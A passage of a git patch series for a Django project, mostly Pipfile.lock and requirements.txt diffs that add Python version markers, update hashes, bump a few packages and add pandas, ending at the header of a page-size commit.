"==1.15.0" }, "django-stubs-ext": { @@ -578,6 +597,7 @@ "sha256:8f0e77289d911069a6a15bab5a25ccf2c0fcb8fc4177461dd17470cfdeb94aa6" ], "index": "pypi", + "markers": "python_version >= '3.6' and python_version < '4.0'", "version": "==2.0" }, "django-xff": { @@ -595,6 +615,7 @@ "sha256:f747949a8ddac876e879190df194b925c177cdeb725a099db1460872f7c0a7f2" ], "index": "pypi", + "markers": "python_version >= '3.5'", "version": "==3.12.4" }, "djangorestframework-dataclasses": { @@ -603,6 +624,7 @@ "sha256:b061ef12f23394e91107f9b915dec38fb0a69d97a0ac9e62207aa90908375211" ], "index": "pypi", + "markers": "python_version >= '3.7'", "version": "==1.3.0" }, "djangorestframework-stubs": { @@ -613,7 +635,7 @@ "sha256:89f6c2add193cb5ab61b9e47187b33a93cc099376a8df5e4d6c3fc8ecb992d3b", "sha256:9475e1374b057ffbdcaaa84a060fe5f01476d8b9014d82a83b4153f57fbcbc1f" ], - "index": "pypi", + "markers": "python_version >= '3.7'", "version": "==1.9.1" }, "docxcompose": { @@ -637,6 +659,7 @@ "sha256:866e16ddaae167a1234c76cd8c351161373551db994ce9665b347b32d5daf38b" ], "index": "pypi", + "markers": "python_version >= '3.6'", "version": "==0.22.1" }, "elasticsearch": { @@ -645,6 +668,7 @@ "sha256:ed9c0cd58e05959a56e306ecf444f794da6afde75b213e26758f7a317e5e668c" ], "index": "pypi", + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' and python_version < '4'", "version": "==7.17.7" }, "elasticsearch-dsl": { @@ -669,6 +693,7 @@ "sha256:9db2c621eeefbc844c8dd88be64aef61e84e2deb29b271e02ab2b5b9f01068e2" ], "index": "pypi", + "markers": "python_version >= '3.7'", "version": "==2.0.1" }, "gevent": { @@ -727,6 +752,7 @@ "sha256:f7ed2346eb9dc4344f9cb0d7963ce5b74fe16fdd031a2809bb6c2b6eba7ebcd5" ], "index": "pypi", + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4, 3.5'", "version": "==22.10.2" }, "gprof2dot": { @@ -741,6 +767,7 @@ "hashes": [ "sha256:03a8f4f3430c3b3ff8d10a2a86028c660355ab637cee9333d63d66b56f09d52a", "sha256:0bf60faf0bc2468089bdc5edd10555bab6e85152191df713e2ab1fcc86382b5a", + "sha256:1087300cf9700bbf455b1b97e24db18f2f77b55302a68272c56209d5587c12d1", "sha256:18a7f18b82b52ee85322d7a7874e676f34ab319b9f8cce5de06067384aa8ff43", "sha256:18e98fb3de7dba1c0a852731c3070cf022d14f0d68b4c87a19cc1016f3bb8b33", "sha256:1a819eef4b0e0b96bb0d98d797bef17dc1b4a10e8d7446be32d1da33e095dbb8", @@ -766,6 +793,7 @@ "sha256:76ae285c8104046b3a7f06b42f29c7b73f77683df18c49ab5af7983994c2dd91", "sha256:7cafd1208fdbe93b67c7086876f061f660cfddc44f404279c1585bbf3cdc64c5", "sha256:7efde645ca1cc441d6dc4b48c0f7101e8d86b54c8530141b09fd31cef5149ec9", + "sha256:8512a0c38cfd4e66a858ddd1b17705587900dd760c6003998e9472b77b56d417", "sha256:88d9ab96491d38a5ab7c56dd7a3cc37d83336ecc564e4e8816dbed12e5aaefc8", "sha256:8eab883b3b2a38cc1e050819ef06a7e6344d4a990d24d45bc6f2cf959045a45b", "sha256:910841381caba4f744a44bf81bfd573c94e10b3045ee00de0cbf436fe50673a6", @@ -789,8 +817,10 @@ "sha256:c9c59a2120b55788e800d82dfa99b9e156ff8f2227f07c5e3012a45a399620b7", "sha256:cd021c754b162c0fb55ad5d6b9d960db667faad0fa2ff25bb6e1301b0b6e6a75", "sha256:d27ec7509b9c18b6d73f2f5ede2622441de812e7b1a80bbd446cb0633bd3d5ae", + "sha256:d4606a527e30548153be1a9f155f4e283d109ffba663a15856089fb55f933e47", "sha256:d5508f0b173e6aa47273bdc0a0b5ba055b59662ba7c7ee5119528f466585526b", "sha256:d75209eed723105f9596807495d58d10b3470fa6732dd6756595e89925ce2470", + "sha256:d967650d3f56af314b72df7089d96cda1083a7fc2da05b375d2bc48c82ab3f3c", "sha256:db1a39669102a1d8d12b57de2bb7e2ec9066a6f2b3da35ae511ff93b01b5d564", "sha256:dbfcfc0218093a19c252ca8eb9aee3d29cfdcb586df21049b9d777fd32c14fd9", "sha256:e0f72c9ddb8cd28532185f54cc1453f2c16fb417a08b53a855c4e6a418edd099", @@ -809,6 +839,7 @@ "sha256:e0a968b5ba15f8a328fdfd7ab1fcb5af4470c28aaf7e55df02a99bc13138e6e8" ], "index": "pypi", + "markers": "python_version >= '3.5'", "version": "==20.1.0" }, "humanize": { @@ -824,6 +855,7 @@ "sha256:90b73b89f807f8b387beaa7f1f86baa4a64fa5674df5db9ab1a7362433f8e3b8" ], "index": "pypi", + "markers": "python_version >= '3'", "version": "==1.0.20" }, "idna": { @@ -832,6 +864,7 @@ "sha256:b97d804b1e9b523befed77c48dacec60e6dcb0b5391d57af6a65a312a90648c0" ], "index": "pypi", + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", "version": "==2.10" }, "inflection": { @@ -917,6 +950,7 @@ "sha256:fe9fb7748e39b30b5723a7f6695e2f6c58707563b94f1239766d2c8b9550f147" ], "index": "pypi", + "markers": "python_version >= '3.5'", "version": "==1.3.0" }, "jsonlog": { @@ -925,6 +959,7 @@ "sha256:ee313731f2a8611a13e0c15cfcfbab75c524f27c8bae24eaeb7ee7a061a60c55" ], "index": "pypi", + "markers": "python_version >= '3.6' and python_version < '4.0'", "version": "==4.0.0" }, "jsonschema": { @@ -933,15 +968,16 @@ "sha256:f660066c3966db7d6daeaea8a75e0b68237a48e51cf49882087757bb59916248" ], "index": "pypi", + "markers": "python_version >= '3.7'", "version": "==4.17.0" }, "kombu": { "hashes": [ - "sha256:48ee589e8833126fd01ceaa08f8a2041334e9f5894e5763c8486a550454551e9", - "sha256:fbd7572d92c0bf71c112a6b45163153dea5a7b6a701ec16b568c27d0fd2370f2" + "sha256:0ba213f630a2cb2772728aef56ac6883dc3a2f13435e10048f6e97d48506dbbd", + "sha256:b753c9cfc9b1e976e637a7cbc1a65d446a22e45546cd996ea28f932082b7dc9e" ], "markers": "python_version >= '3.8'", - "version": "==5.3.1" + "version": "==5.3.2" }, "lxml": { "hashes": [ @@ -1017,6 +1053,7 @@ "sha256:fe749b052bb7233fe5d072fcb549221a8cb1a16725c47c37e42b0b9cb3ff2c3f" ], "index": "pypi", + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", "version": "==4.9.1" }, "marisa-trie": { @@ -1086,6 +1123,7 @@ "sha256:fb76cbb76a10231b6e7366a31a7eecfc742d32f8988ded0b5ae8b325c49ef103" ], "index": "pypi", + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", "version": "==0.8.0" }, "markuppy": { @@ -1204,6 +1242,7 @@ "sha256:eda5c8b9949ed411ff752b9a01adda31afe7eae1e53e946dbdf9db23865e66c4" ], "index": "pypi", + "markers": "python_version >= '3.7'", "version": "==1.0.1" }, "mypy-extensions": { @@ -1225,6 +1264,7 @@ "sha256:9c6b142836c7dba4f723bf9c93cc46b6e5081d65b2af807f400dda9eb85a16d0" ], "index": "pypi", + "markers": "python_version >= '3.8'", "version": "==2.2.0" }, "networkit": { @@ -1257,7 +1297,7 @@ "sha256:4f33f68cb2afcf86f28a45f43efc27a9386b535d567d2127f8f61d51dec58d36", "sha256:de346335408f84de0eada6ff9fafafff9bcda11f0a0dfaa931133debb146ab61" ], - "index": "pypi", + "markers": "python_version >= '3.8'", "version": "==3.1" }, "numpy": { @@ -1304,6 +1344,7 @@ "sha256:8f3b11bd896a95468a4ab162fc4fcd260d46157155d1f8bfaabb99d88cfcf79f" ], "index": "pypi", + "markers": "python_version >= '3.6'", "version": "==3.0.9" }, "oss2": { @@ -1319,8 +1360,35 @@ "sha256:ef103e05f519cdc783ae24ea4e2e0f508a9c99b2d4969652eed6a2e1ea5bd522" ], "index": "pypi", + "markers": "python_version >= '3.6'", "version": "==21.3" }, + "pandas": { + "hashes": [ + "sha256:0164b85937707ec7f70b34a6c3a578dbf0f50787f910f21ca3b26a7fd3363437", + "sha256:28f330845ad21c11db51e02d8d69acc9035edfd1116926ff7245c7215db57957", + "sha256:38f74ef7ebc0ffb43b3d633e23d74882bce7e27bfa09607f3c5d3e03ffd9a4a5", + "sha256:40dd20439ff94f1b2ed55b393ecee9cb6f3b08104c2c40b0cb7186a2f0046242", + "sha256:629124923bcf798965b054a540f9ccdfd60f71361255c81fa1ecd94a904b9dd3", + "sha256:62c24c7fc59e42b775ce0679cfa7b14a5f9bfb7643cfbe708c960699e05fb918", + "sha256:6e6a0fe052cf27ceb29be9429428b4918f3740e37ff185658f40d8702f0b3e09", + "sha256:70cf866af3ab346a10debba8ea78077cf3a8cd14bd5e4bed3d41555a3280041c", + "sha256:86f100b3876b8c6d1a2c66207288ead435dc71041ee4aea789e55ef0e06408cb", + "sha256:9d81e1813191070440d4c7a413cb673052b3b4a984ffd86b8dd468c45742d3cc", + "sha256:b31da36d376d50a1a492efb18097b9101bdbd8b3fbb3f49006e02d4495d4c644", + "sha256:b9a6ccf0963db88f9b12df6720e55f337447aea217f426a22d71f4213a3099a6", + "sha256:cda72cc8c4761c8f1d97b169661f23a86b16fdb240bdc341173aee17e4d6cedd", + "sha256:d4f38e4fedeba580285eaac7ede4f686c6701a9e618d8a857b138a126d067f2f", + "sha256:d53c8c1001f6a192ff1de1efe03b31a423d0eee2e9e855e69d004308e046e694", + "sha256:d8c58b1113892e0c8078f006a167cc210a92bdae23322bb4614f2f0b7a4b510f", + "sha256:d97daeac0db8c993420b10da4f5f5b39b01fc9ca689a17844e07c0a35ac96b4b", + "sha256:d99e678180bc59b0c9443314297bddce4ad35727a1a2656dbe585fd78710b3b9", + "sha256:eb20252720b1cc1b7d0b2879ffc7e0542dd568f24d7c4b2347cb035206936421" + ], + "index": "pypi", + "markers": "python_version >= '3.9'", + "version": "==2.1.0" + }, "pep8": { "hashes": [ "sha256:b22cfae5db09833bb9bd7c8463b53e1a9c9b39f12e304a8d0bba729c501827ee", @@ -1394,6 +1462,7 @@ "sha256:f1ff2ee69f10f13a9596480335f406dd1f70c3650349e2be67ca3139280cade0" ], "index": "pypi", + "markers": "python_version >= '3.7'", "version": "==9.3.0" }, "prometheus-client": { @@ -1496,6 +1565,7 @@ "sha256:f8524b8bc89470cec7ac51734907818d3620fb1637f8f8b542d650ebec42a126" ], "index": "pypi", + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", "version": "==3.14.1" }, "pydantic": { @@ -1546,6 +1616,7 @@ "sha256:816927a350f38d56072aeca5dfb10221fe1dc653745853d30a216637f5d7ad36" ], "index": "pypi", + "markers": "python_version >= '3.6'", "version": "==1.0.2" }, "pyparsing": { @@ -1577,6 +1648,7 @@ "sha256:f3ae7b087abcbc4b910d535c2fb877ef452b61d2514a63fd15b8b020b51fe4b5" ], "index": "pypi", + "markers": "python_version >= '3.6'", "version": "==0.3.6" }, "pyrsistent": { @@ -1605,6 +1677,7 @@ "sha256:d16ac5ab3d9db78fed40c884d67079524e4cf8276639211ad9e6fa73e727727e" ], "index": "pypi", + "markers": "python_version >= '3.7'", "version": "==0.19.1" }, "python-crontab": { @@ -1635,6 +1708,7 @@ "sha256:f380b826a991ebbe3de4d897aeec42760035ac760345e57b812938dc8b35e2bd" ], "index": "pypi", + "markers": "python_version >= '3.6'", "version": "==2.0.7" }, "pytz": { @@ -1647,7 +1721,9 @@ }, "pyyaml": { "hashes": [ + "sha256:04ac92ad1925b2cff1db0cfebffb6ffc43457495c9b3c39d3fcae417d7125dc5", "sha256:062582fca9fabdd2c8b54a3ef1c978d786e0f6b3a1510e0ac93ef59e0ddae2bc", + "sha256:0d3304d8c0adc42be59c5f8a4d9e3d7379e6955ad754aa9d6ab7a398b59dd1df", "sha256:1635fd110e8d85d55237ab316b5b011de701ea0f29d07611174a1b42f1444741", "sha256:184c5108a2aca3c5b3d3bf9395d50893a7ab82a38004c8f61c258d4428e80206", "sha256:18aeb1bf9a78867dc38b259769503436b7c72f7a1f1f4c93ff9a17de54319b27", @@ -1655,7 +1731,10 @@ "sha256:1e2722cc9fbb45d9b87631ac70924c11d3a401b2d7f410cc0e3bbf249f2dca62", "sha256:1fe35611261b29bd1de0070f0b2f47cb6ff71fa6595c077e42bd0c419fa27b98", "sha256:28c119d996beec18c05208a8bd78cbe4007878c6dd15091efb73a30e90539696", + "sha256:326c013efe8048858a6d312ddd31d56e468118ad4cdeda36c719bf5bb6192290", + "sha256:40df9b996c2b73138957fe23a16a4f0ba614f4c0efce1e9406a184b6d07fa3a9", "sha256:42f8152b8dbc4fe7d96729ec2b99c7097d656dc1213a3229ca5383f973a5ed6d", + "sha256:49a183be227561de579b4a36efbb21b3eab9651dd81b1858589f796549873dd6", "sha256:4fb147e7a67ef577a588a0e2c17b6db51dda102c71de36f8549b6816a96e1867", "sha256:50550eb667afee136e9a77d6dc71ae76a44df8b3e51e41b77f6de2932bfe0f47", "sha256:510c9deebc5c0225e8c96813043e62b680ba2f9c50a08d3724c7f28a747d1486", @@ -1663,9 +1742,12 @@ "sha256:596106435fa6ad000c2991a98fa58eeb8656ef2325d7e158344fb33864ed87e3", "sha256:6965a7bc3cf88e5a1c3bd2e0b5c22f8d677dc88a455344035f03399034eb3007", "sha256:69b023b2b4daa7548bcfbd4aa3da05b3a74b772db9e23b982788168117739938", + "sha256:6c22bec3fbe2524cde73d7ada88f6566758a8f7227bfbf93a408a9d86bcc12a0", "sha256:704219a11b772aea0d8ecd7058d0082713c3562b4e271b849ad7dc4a5c90c13c", "sha256:7e07cbde391ba96ab58e532ff4803f79c4129397514e1413a7dc761ccd755735", "sha256:81e0b275a9ecc9c0c0c07b4b90ba548307583c125f54d5b6946cfee6360c733d", + "sha256:855fb52b0dc35af121542a76b9a84f8d1cd886ea97c84703eaa6d88e37a2ad28", + "sha256:8d4e9c88387b0f5c7d5f281e55304de64cf7f9c0021a3525bd3b1c542da3b0e4", "sha256:9046c58c4395dff28dd494285c82ba00b546adfc7ef001486fbf0324bc174fba", "sha256:9eb6caa9a297fc2c2fb8862bc5370d0303ddba53ba97e71f08023b6cd73d16a8", "sha256:a0cd17c15d3bb3fa06978b4e8958dcdc6e0174ccea823003a106c7d4d7899ac5", @@ -1680,7 +1762,9 @@ "sha256:bfdf460b1736c775f2ba9f6a92bca30bc2095067b8a9d77876d1fad6cc3b4a43", "sha256:c8098ddcc2a85b61647b2590f825f3db38891662cfc2fc776415143f599bb859", "sha256:d2b04aac4d386b172d5b9692e2d2da8de7bfb6c387fa4f801fbf6fb2e6ba4673", + "sha256:d483d2cdf104e7c9fa60c544d92981f12ad66a457afae824d146093b8c294c54", "sha256:d858aa552c999bc8a8d57426ed01e40bef403cd8ccdd0fc5f6f04a00414cac2a", + "sha256:e7d73685e87afe9f3b36c799222440d6cf362062f78be1013661b00c5c6f678b", "sha256:f003ed9ad21d6a4713f0a9b5a7a0a79e08dd0f221aff4525a2be4c346ee60aab", "sha256:f22ac1c3cac4dbc50079e965eba2c1058622631e526bd9afd45fedd49ba781fa", "sha256:faca3bdcf85b2fc05d06ff3fbc1f83e1391b3e724afa3feba7d13eeab355484c", @@ -1697,6 +1781,7 @@ "sha256:da92a39fec86438d3f1e2a1db33c312985806954fe860120b582a8430e231d8f" ], "index": "pypi", + "markers": "python_version >= '3.7'", "version": "==4.4.4" }, "requests": { @@ -1705,6 +1790,7 @@ "sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1" ], "index": "pypi", + "markers": "python_version >= '3.7'", "version": "==2.31.0" }, "result": { @@ -1713,6 +1799,7 @@ "sha256:d6a6258f32c057a4e0478999c6ce43dcadaf8ea435f58ac601ae2768f93ef243" ], "index": "pypi", + "markers": "python_version >= '3.7'", "version": "==0.8.0" }, "s3transfer": { @@ -1760,6 +1847,7 @@ "sha256:e197a19aa8ec9722928f2206f8de752def0e4c9fc6953527360d1c36d94ddb2f" ], "index": "pypi", + "markers": "python_version >= '3.7'", "version": "==65.5.1" }, "shortuuid": { @@ -1768,6 +1856,7 @@ "sha256:fc75f2615914815a8e4cb1501b3a513745cb66ef0fd5fc6fb9f8c3fa3481f789" ], "index": "pypi", + "markers": "python_version >= '3.5'", "version": "==1.0.11" }, "simhash": { @@ -1787,6 +1876,7 @@ "sha256:8b74bedcbbbaca38ff6d7491d76f2b06b3592611af620f8426e82dddb04a5ced" ], "index": "pypi", + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", "version": "==1.15.0" }, "sqlparse": { @@ -1839,11 +1929,11 @@ }, "types-awscrt": { "hashes": [ - "sha256:0e31d7ba44e1898af37d224b94d28ffaef19baf89bb18ea2599de9ac0910a07f", - "sha256:eaef60422cf716b4ae216f164b74d679c82b0d9c53db380a37deb29ae5579b1b" + "sha256:61833aa140e724a9098025610f4b8cde3dcf65b842631d7447378f9f5db4e1fd", + "sha256:68fffeb75396e9e7614cd930b2d52295f680230774750907bcafb56f11514043" ], "markers": "python_version >= '3.7' and python_version < '4.0'", - "version": "==0.19.0" + "version": "==0.19.1" }, "types-pymysql": { "hashes": [ @@ -1921,6 +2011,7 @@ "sha256:b75ddc264f0ba5615db7ba217daeb99701ad295353c45f9e95963337ceeeffb2" ], "index": "pypi", + "markers": "python_version >= '3.7'", "version": "==4.7.1" }, "typing-inspect": { @@ -1952,6 +2043,7 @@ "sha256:a7acd0977125325f516bda9735fa7142b909a8d01e8b2e4c8108d0984e6e0098" ], "index": "pypi", + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' and python_version < '4'", "version": "==1.26.5" }, "uwsgi": { diff --git a/requirements.txt b/requirements.txt index 6a543121d..51269b430 100644 --- a/requirements.txt +++ b/requirements.txt @@ -2,130 +2,131 @@ aliyun-python-sdk-core==2.13.36 aliyun-python-sdk-core-v3==2.13.33 aliyun-python-sdk-kms==2.16.1 -amqp==5.1.1 ; python_version >= '3.6' -asgiref==3.7.2 -async-timeout==4.0.3 ; python_version >= '3.7' -attrs==23.1.0 ; python_version >= '3.7' -autopep8==2.0.4 ; python_version >= '3.6' -billiard==4.1.0 ; python_version >= '3.7' -boto3==1.24.59 -boto3-stubs==1.28.35 -botocore==1.27.91 -botocore-stubs==1.31.35 -celery==5.3.0rc1 -celery-singleton==0.3.1 -certifi==2023.7.22 +amqp==5.1.1; python_version >= '3.6' +asgiref==3.7.2; python_version >= '3.7' +async-timeout==4.0.3; python_version >= '3.7' +attrs==23.1.0; python_version >= '3.7' +autopep8==2.0.4; python_version >= '3.6' +billiard==4.1.0; python_version >= '3.7' +boto3==1.24.59; python_version >= '3.7' +boto3-stubs==1.28.40; python_version >= '3.7' +botocore==1.27.91; python_version >= '3.7' +botocore-stubs==1.31.40; python_version >= '3.7' and python_version < '4.0' +celery==5.3.0rc1; python_version >= '3.7' +celery-singleton==0.3.1; python_version >= '3.6' and python_version < '4.0' +certifi==2023.7.22; python_version >= '3.6' cffi==1.15.1 -chardet==5.2.0 -charset-normalizer==3.2.0 ; python_full_version >= '3.7.0' -click==8.1.7 ; python_version >= '3.7' -click-didyoumean==0.3.0 ; python_full_version >= '3.6.2' and python_full_version < '4.0.0' +chardet==5.2.0; python_version >= '3.7' +charset-normalizer==3.2.0; python_full_version >= '3.7.0' +click==8.1.7; python_version >= '3.7' +click-didyoumean==0.3.0; python_full_version >= '3.6.2' and python_full_version < '4.0.0' click-plugins==1.1.1 -click-repl==0.3.0 ; python_version >= '3.6' +click-repl==0.3.0; python_version >= '3.6' crcmod==1.7 -cryptography==41.0.3 -dataclasses-json==0.5.14 +cryptography==41.0.3; python_version >= '3.7' +dataclasses-json==0.5.14; python_version < '3.13' and python_version >= '3.7' ddt==1.6.0 -defusedxml==0.7.1 ; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' -diff-match-patch==20230430 ; python_version >= '3.7' -django==3.2.20 +defusedxml==0.7.1; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' +diff-match-patch==20230430; python_version >= '3.7' +django==3.2.20; python_version >= '3.6' django-add-default-value==0.10.0 django-celery-beat==2.2.0 -django-cors-headers==4.2.0 +django-cors-headers==4.2.0; python_version >= '3.8' django-cprofile-middleware==1.0.5 django-elasticsearch-dsl==7.2.2 -django-filter==23.2 -django-health-check==3.17.0 -django-import-export==2.5.0 -django-mock-queries==v2.1.7 +django-filter==23.2; python_version >= '3.7' +django-health-check==3.17.0; python_version >= '3.8' +django-import-export==2.5.0; python_version >= '3.5' +django-mock-queries==2.1.7 django-modeltranslation==0.17.7 django-prometheus==2.3.1 django-ranged-response==0.2.0 -django-redis==5.2.0 +django-redis==5.2.0; python_version >= '3.6' django-rest-framework-proxy==1.6.0 -django-seriously==0.4.3 -django-silk==5.0.3 +django-seriously==0.4.3; python_version >= '3.6' +django-silk==5.0.3; python_version >= '3.7' django-simple-captcha==0.5.18 -django-stubs[compatible-mypy]==1.15.0 -django-stubs-ext==4.2.2 ; python_version >= '3.8' -django-timezone-field==4.2.3 ; python_version >= '3.5' +django-stubs[compatible-mypy]==1.15.0; python_version >= '3.7' +django-stubs-ext==4.2.2; python_version >= '3.8' +django-timezone-field==4.2.3; python_version >= '3.5' django-utils==0.0.2 -django-utils-six==2.0 +django-utils-six==2.0; python_version >= '3.6' and python_version < '4.0' django-xff==1.4.0 -djangorestframework==3.12.4 -djangorestframework-dataclasses==1.3.0 -djangorestframework-stubs[compatible-mypy]==1.9.1 +djangorestframework==3.12.4; python_version >= '3.5' +djangorestframework-dataclasses==1.3.0; python_version >= '3.7' +djangorestframework-stubs[compatible-mypy]==1.9.1; python_version >= '3.7' docxcompose==1.3.4 docxtpl==0.16.0 -drf-spectacular==0.22.1 -elasticsearch==7.17.7 -elasticsearch-dsl==7.4.1 ; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' -et-xmlfile==1.1.0 ; python_version >= '3.6' -flower==2.0.1 -gevent==22.10.2 -gprof2dot==2022.7.29 ; python_version >= '2.7' -greenlet==2.0.2 ; platform_python_implementation == 'CPython' -gunicorn==20.1.0 -humanize==4.8.0 ; python_version >= '3.8' -id-validator==1.0.20 -idna==2.10 -inflection==0.5.1 ; python_version >= '3.5' -jinja2==3.1.2 ; python_version >= '3.7' -jmespath==0.10.0 ; python_version >= '2.6' and python_version not in '3.0, 3.1, 3.2, 3.3' -jq==1.3.0 -jsonlog==4.0.0 -jsonschema==4.17.0 -kombu==5.3.1 ; python_version >= '3.8' -lxml==4.9.1 -marisa-trie==0.8.0 +drf-spectacular==0.22.1; python_version >= '3.6' +elasticsearch==7.17.7; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' and python_version < '4' +elasticsearch-dsl==7.4.1; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' +et-xmlfile==1.1.0; python_version >= '3.6' +flower==2.0.1; python_version >= '3.7' +gevent==22.10.2; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4, 3.5' +gprof2dot==2022.7.29; python_version >= '2.7' +greenlet==2.0.2; platform_python_implementation == 'CPython' +gunicorn==20.1.0; python_version >= '3.5' +humanize==4.8.0; python_version >= '3.8' +id-validator==1.0.20; python_version >= '3' +idna==2.10; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' +inflection==0.5.1; python_version >= '3.5' +jinja2==3.1.2; python_version >= '3.7' +jmespath==0.10.0; python_version >= '2.6' and python_version not in '3.0, 3.1, 3.2, 3.3' +jq==1.3.0; python_version >= '3.5' +jsonlog==4.0.0; python_version >= '3.6' and python_version < '4.0' +jsonschema==4.17.0; python_version >= '3.7' +kombu==5.3.2; python_version >= '3.8' +lxml==4.9.1; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' +marisa-trie==0.8.0; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' markuppy==1.14 -markupsafe==2.1.3 ; python_version >= '3.7' -marshmallow==3.20.1 ; python_version >= '3.8' -mock==5.1.0 ; python_version >= '3.6' -model-bakery==1.15.0 ; python_version >= '3' -mypy==1.0.1 -mypy-extensions==1.0.0 ; python_version >= '3.5' -mysqlclient==2.2.0 +markupsafe==2.1.3; python_version >= '3.7' +marshmallow==3.20.1; python_version >= '3.8' +mock==5.1.0; python_version >= '3.6' +model-bakery==1.15.0; python_version >= '3' +mypy==1.0.1; python_version >= '3.7' +mypy-extensions==1.0.0; python_version >= '3.5' +mysqlclient==2.2.0; python_version >= '3.8' networkit==10.1 -networkx[all]==3.1 -numpy==1.25.2 ; python_version >= '3.9' +networkx[all]==3.1; python_version >= '3.8' +numpy==1.25.2; python_version >= '3.9' odfpy==1.4.1 -openpyxl==3.0.9 +openpyxl==3.0.9; python_version >= '3.6' oss2==2.13.1 -packaging==21.3 +packaging==21.3; python_version >= '3.6' +pandas==2.1.0; python_version >= '3.9' pep8==1.7.1 -pillow==9.3.0 -prometheus-client==0.17.1 ; python_version >= '3.6' -prompt-toolkit==3.0.39 ; python_full_version >= '3.7.0' -pycodestyle==2.11.0 ; python_version >= '3.8' +pillow==9.3.0; python_version >= '3.7' +prometheus-client==0.17.1; python_version >= '3.6' +prompt-toolkit==3.0.39; python_full_version >= '3.7.0' +pycodestyle==2.11.0; python_version >= '3.8' pycparser==2.21 -pycryptodome==3.18.0 ; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' -pycryptodomex==3.14.1 -pydantic==1.10.12 ; python_version >= '3.7' -pymysql==1.0.2 -pyparsing==3.1.1 ; python_full_version >= '3.6.8' -pyre2==0.3.6 -pyrsistent==0.19.1 +pycryptodome==3.18.0; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' +pycryptodomex==3.14.1; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' +pydantic==1.10.12; python_version >= '3.7' +pymysql==1.0.2; python_version >= '3.6' +pyparsing==3.1.1; python_full_version >= '3.6.8' +pyre2==0.3.6; python_version >= '3.6' +pyrsistent==0.19.1; python_version >= '3.7' python-crontab==3.0.0 -python-dateutil==2.8.2 ; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' +python-dateutil==2.8.2; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' python-docx==0.8.11 -python-json-logger==2.0.7 +python-json-logger==2.0.7; python_version >= '3.6' pytz==2022.6 -pyyaml==6.0.1 ; python_version >= '3.6' -redis==4.4.4 -requests==2.31.0 -result==0.8.0 -s3transfer==0.6.2 ; python_version >= '3.7' -scipy==1.11.2 ; python_version < '3.13' and python_version >= '3.9' -setuptools==65.5.1 -shortuuid==1.0.11 +pyyaml==6.0.1; python_version >= '3.6' +redis==4.4.4; python_version >= '3.7' +requests==2.31.0; python_version >= '3.7' +result==0.8.0; python_version >= '3.7' +s3transfer==0.6.2; python_version >= '3.7' +scipy==1.11.2; python_version < '3.13' and python_version >= '3.9' +setuptools==65.5.1; python_version >= '3.7' +shortuuid==1.0.11; python_version >= '3.5' simhash==2.1.2 -six==1.15.0 -sqlparse==0.4.4 ; python_version >= '3.5' -tablib[html,ods,xls,xlsx,yaml]==3.5.0 ; python_version >= '3.8' -tomli==2.0.1 ; python_version < '3.11' -tornado==6.3.3 ; python_version >= '3.8' -types-awscrt==0.19.0 ; python_version >= '3.7' and python_version < '4.0' +six==1.15.0; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' +sqlparse==0.4.4; python_version >= '3.5' +tablib[html,ods,xls,xlsx,yaml]==3.5.0; python_version >= '3.8' +tomli==2.0.1; python_version < '3.11' +tornado==6.3.3; python_version >= '3.8' +types-awscrt==0.19.1; python_version >= '3.7' and python_version < '4.0' types-pymysql==1.1.0.1 types-pyopenssl==23.2.0.2 types-python-dateutil==2.8.19.14 @@ -133,18 +134,18 @@ types-pytz==2023.3.0.1 types-pyyaml==6.0.12.11 types-redis==4.6.0.5 types-requests==2.31.0.2 -types-s3transfer==0.6.2 ; python_version >= '3.7' and python_version < '4.0' +types-s3transfer==0.6.2; python_version >= '3.7' and python_version < '4.0' types-urllib3==1.26.25.14 -typing-extensions==4.7.1 +typing-extensions==4.7.1; python_version >= '3.7' typing-inspect==0.9.0 -tzdata==2023.3 ; python_version >= '2' -uritemplate==4.1.1 ; python_version >= '3.6' -urllib3==1.26.5 +tzdata==2023.3; python_version >= '2' +uritemplate==4.1.1; python_version >= '3.6' +urllib3==1.26.5; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' and python_version < '4' uwsgi==2.0.22 uwsgitop==0.11 -vine==5.0.0 ; python_version >= '3.6' +vine==5.0.0; python_version >= '3.6' wcwidth==0.2.6 xlrd==2.0.1 xlwt==1.3.0 -zope.event==5.0 ; python_version >= '3.7' -zope.interface==6.0 ; python_version >= '3.7' +zope.event==5.0; python_version >= '3.7' +zope.interface==6.0; python_version >= '3.7' From 870cb68e12054c55732c80d3cc3b3348b462dde6 Mon Sep 17 00:00:00 2001 From: st1020 Date: Mon, 4 Sep 2023 14:39:07 +0800 Subject: [PATCH 058/114] feat: custom max page size --- dongtai_common/endpoint/__init__.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/dongtai_common/endpoint/__init__.py b/dongtai_common/endpoint/__init__.py index b02d3b4fc..455fc641c 100644 --- a/dongtai_common/endpoint/__init__.py +++ 